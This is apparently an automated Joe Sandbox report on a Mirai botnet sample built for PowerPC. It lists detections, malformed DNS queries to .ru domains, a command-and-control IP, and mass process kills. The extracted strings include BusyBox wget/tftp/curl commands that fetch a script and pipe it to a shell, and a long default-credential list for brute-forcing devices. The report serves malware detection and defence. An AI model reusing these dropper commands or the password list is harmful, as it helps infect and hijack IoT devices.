Edit tour

Linux Analysis Report
rep.ppc.elf

Overview

General Information

Sample name:rep.ppc.elf
Analysis ID:1653457
MD5:e9082b6cc402fc736c9193d14ae6d5f4
SHA1:7778718ba1f24d948a6e8ac4cc1c54bf31722ee6
SHA256:a187c42abbd1f889f24e082a5b436a614d09bfea86271e5bfcae1a08b9d4381a
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:80
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample tries to kill multiple processes (SIGKILL)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1653457
Start date and time:2025-04-01 09:40:22 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:rep.ppc.elf
Detection:MAL
Classification:mal80.spre.troj.linELF@0/0@9/0
Command:/tmp/rep.ppc.elf
PID:5429
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • rep.ppc.elf (PID: 5429, Parent: 5350, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/rep.ppc.elf
  • gdm3 New Fork (PID: 5458, Parent: 1400)
  • Default (PID: 5458, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5466, Parent: 1400)
  • Default (PID: 5466, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • rm (PID: 5468, Parent: 2984, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec7c2e14-9c4d-40f3-9704-8617ab831fb4
  • xfwm4 (PID: 5470, Parent: 2984, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
  • xfdesktop (PID: 5472, Parent: 2984, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
  • xfce4-panel (PID: 5474, Parent: 2984, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
  • xfwm4 (PID: 5476, Parent: 2984, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
  • xfdesktop (PID: 5478, Parent: 2984, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
  • xfce4-panel (PID: 5480, Parent: 2984, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
  • systemd New Fork (PID: 5492, Parent: 1)
  • systemd-user-runtime-dir (PID: 5492, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
rep.ppc.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    rep.ppc.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5435.1.00007fecb8001000.00007fecb8018000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: rep.ppc.elfAvira: detected
                Source: rep.ppc.elfVirustotal: Detection: 50%Perma Link
                Source: rep.ppc.elfReversingLabs: Detection: 47%
                Source: rep.ppc.elfString: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

                Networking

                barindex
                Source: global trafficDNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: mykittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: kittlerer.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cat-are-here.ru. [malformed]
                Source: global trafficTCP traffic: 192.168.2.13:39384 -> 45.135.194.73:34411
                Source: /tmp/rep.ppc.elf (PID: 5429)Socket: 127.0.0.1:13301Jump to behavior
                Source: unknownTCP traffic detected without corresponding DNS query: 86.126.115.122
                Source: unknownTCP traffic detected without corresponding DNS query: 163.77.150.110
                Source: unknownTCP traffic detected without corresponding DNS query: 211.98.97.40
                Source: unknownTCP traffic detected without corresponding DNS query: 97.51.54.229
                Source: unknownTCP traffic detected without corresponding DNS query: 43.122.107.180
                Source: unknownTCP traffic detected without corresponding DNS query: 16.204.78.196
                Source: unknownTCP traffic detected without corresponding DNS query: 157.112.89.233
                Source: unknownTCP traffic detected without corresponding DNS query: 9.87.19.223
                Source: unknownTCP traffic detected without corresponding DNS query: 89.214.6.78
                Source: unknownTCP traffic detected without corresponding DNS query: 68.51.53.16
                Source: unknownTCP traffic detected without corresponding DNS query: 113.143.169.220
                Source: unknownTCP traffic detected without corresponding DNS query: 115.165.9.124
                Source: unknownTCP traffic detected without corresponding DNS query: 14.162.101.86
                Source: unknownTCP traffic detected without corresponding DNS query: 221.190.48.86
                Source: unknownTCP traffic detected without corresponding DNS query: 108.181.143.40
                Source: unknownTCP traffic detected without corresponding DNS query: 162.142.13.217
                Source: unknownTCP traffic detected without corresponding DNS query: 63.60.6.42
                Source: unknownTCP traffic detected without corresponding DNS query: 209.70.82.201
                Source: unknownTCP traffic detected without corresponding DNS query: 12.150.166.125
                Source: unknownTCP traffic detected without corresponding DNS query: 218.59.146.160
                Source: unknownTCP traffic detected without corresponding DNS query: 41.140.224.47
                Source: unknownTCP traffic detected without corresponding DNS query: 220.90.22.208
                Source: unknownTCP traffic detected without corresponding DNS query: 146.89.161.198
                Source: unknownTCP traffic detected without corresponding DNS query: 130.97.240.159
                Source: unknownTCP traffic detected without corresponding DNS query: 69.149.103.63
                Source: unknownTCP traffic detected without corresponding DNS query: 171.114.217.29
                Source: unknownTCP traffic detected without corresponding DNS query: 20.252.72.121
                Source: unknownTCP traffic detected without corresponding DNS query: 200.187.88.217
                Source: unknownTCP traffic detected without corresponding DNS query: 59.72.61.169
                Source: unknownTCP traffic detected without corresponding DNS query: 216.152.21.20
                Source: unknownTCP traffic detected without corresponding DNS query: 213.62.46.246
                Source: unknownTCP traffic detected without corresponding DNS query: 149.219.194.158
                Source: unknownTCP traffic detected without corresponding DNS query: 109.7.79.41
                Source: unknownTCP traffic detected without corresponding DNS query: 206.215.173.153
                Source: unknownTCP traffic detected without corresponding DNS query: 199.57.122.64
                Source: unknownTCP traffic detected without corresponding DNS query: 129.247.171.52
                Source: unknownTCP traffic detected without corresponding DNS query: 112.249.18.61
                Source: unknownTCP traffic detected without corresponding DNS query: 96.179.233.183
                Source: unknownTCP traffic detected without corresponding DNS query: 146.40.239.218
                Source: unknownTCP traffic detected without corresponding DNS query: 48.112.235.132
                Source: unknownTCP traffic detected without corresponding DNS query: 188.98.241.185
                Source: global trafficDNS traffic detected: DNS query: cuttiecats.ru
                Source: global trafficDNS traffic detected: DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cuttiecats.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: mykittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: kittlerer.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cat-are-here.ru. [malformed]
                Source: rep.ppc.elfString found in binary or memory: http:///curl.sh
                Source: rep.ppc.elfString found in binary or memory: http:///wget.sh

                System Summary

                barindex
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 726, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 727, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 792, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 1563, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 1745, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 1805, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 2961, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 2964, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 2984, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3069, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3114, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3132, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3134, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3146, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3147, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3153, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3158, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3181, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3183, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3185, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3203, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3220, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5413, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5414, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5433, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5435, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5462, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5466, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5467, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5468, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5469, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5470, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5471, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5472, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5473, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5474, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5475, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5476, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5477, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5478, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5479, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5480, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5481, result: successfulJump to behavior
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
                Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
                Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .d
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: 654321
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 726, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 727, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 792, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 1563, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 1745, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 1805, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 2961, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 2964, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 2984, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3069, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3114, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3132, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3134, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3146, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3147, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3153, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3158, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3181, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3183, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3185, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3203, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 3220, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5413, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5414, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5433, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5435, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5462, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5466, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5467, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5468, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5469, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5470, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5471, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5472, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5473, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5474, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5475, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5476, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5477, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5478, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5479, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5480, result: successfulJump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5437)SIGKILL sent: pid: 5481, result: successfulJump to behavior
                Source: classification engineClassification label: mal80.spre.troj.linELF@0/0@9/0
                Source: /usr/bin/xfce4-session (PID: 5468)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec7c2e14-9c4d-40f3-9704-8617ab831fb4Jump to behavior
                Source: /tmp/rep.ppc.elf (PID: 5429)Queries kernel information via 'uname': Jump to behavior
                Source: rep.ppc.elfBinary or memory string: vmware
                Source: rep.ppc.elf, 5429.1.000055d44376d000.000055d44381d000.rw-.sdmp, rep.ppc.elf, 5433.1.000055d44376d000.000055d44381d000.rw-.sdmp, rep.ppc.elf, 5435.1.000055d44376d000.000055d44381d000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
                Source: rep.ppc.elf, 5429.1.000055d44376d000.000055d44381d000.rw-.sdmp, rep.ppc.elf, 5433.1.000055d44376d000.000055d44381d000.rw-.sdmp, rep.ppc.elf, 5435.1.000055d44376d000.000055d44381d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
                Source: rep.ppc.elf, 5429.1.00007ffc1069d000.00007ffc106be000.rw-.sdmp, rep.ppc.elf, 5433.1.00007ffc1069d000.00007ffc106be000.rw-.sdmp, rep.ppc.elf, 5435.1.00007ffc1069d000.00007ffc106be000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
                Source: rep.ppc.elf, 5429.1.00007ffc1069d000.00007ffc106be000.rw-.sdmp, rep.ppc.elf, 5433.1.00007ffc1069d000.00007ffc106be000.rw-.sdmp, rep.ppc.elf, 5435.1.00007ffc1069d000.00007ffc106be000.rw-.sdmpBinary or memory string: x&x86_64/usr/bin/qemu-ppc/tmp/rep.ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/rep.ppc.elf
                Source: rep.ppc.elfBinary or memory string: vmware123
                Source: rep.ppc.elfBinary or memory string: / nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: rep.ppc.elf, type: SAMPLE
                Source: Yara matchFile source: 5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5435.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: rep.ppc.elf, type: SAMPLE
                Source: Yara matchFile source: 5433.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5429.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5435.1.00007fecb8001000.00007fecb8018000.r-x.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path Interception1
                File Deletion
                1
                Brute Force
                11
                Security Software Discovery
                Remote ServicesData from Local System1
                Non-Standard Port
                Exfiltration Over Other Network Medium1
                Service Stop
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
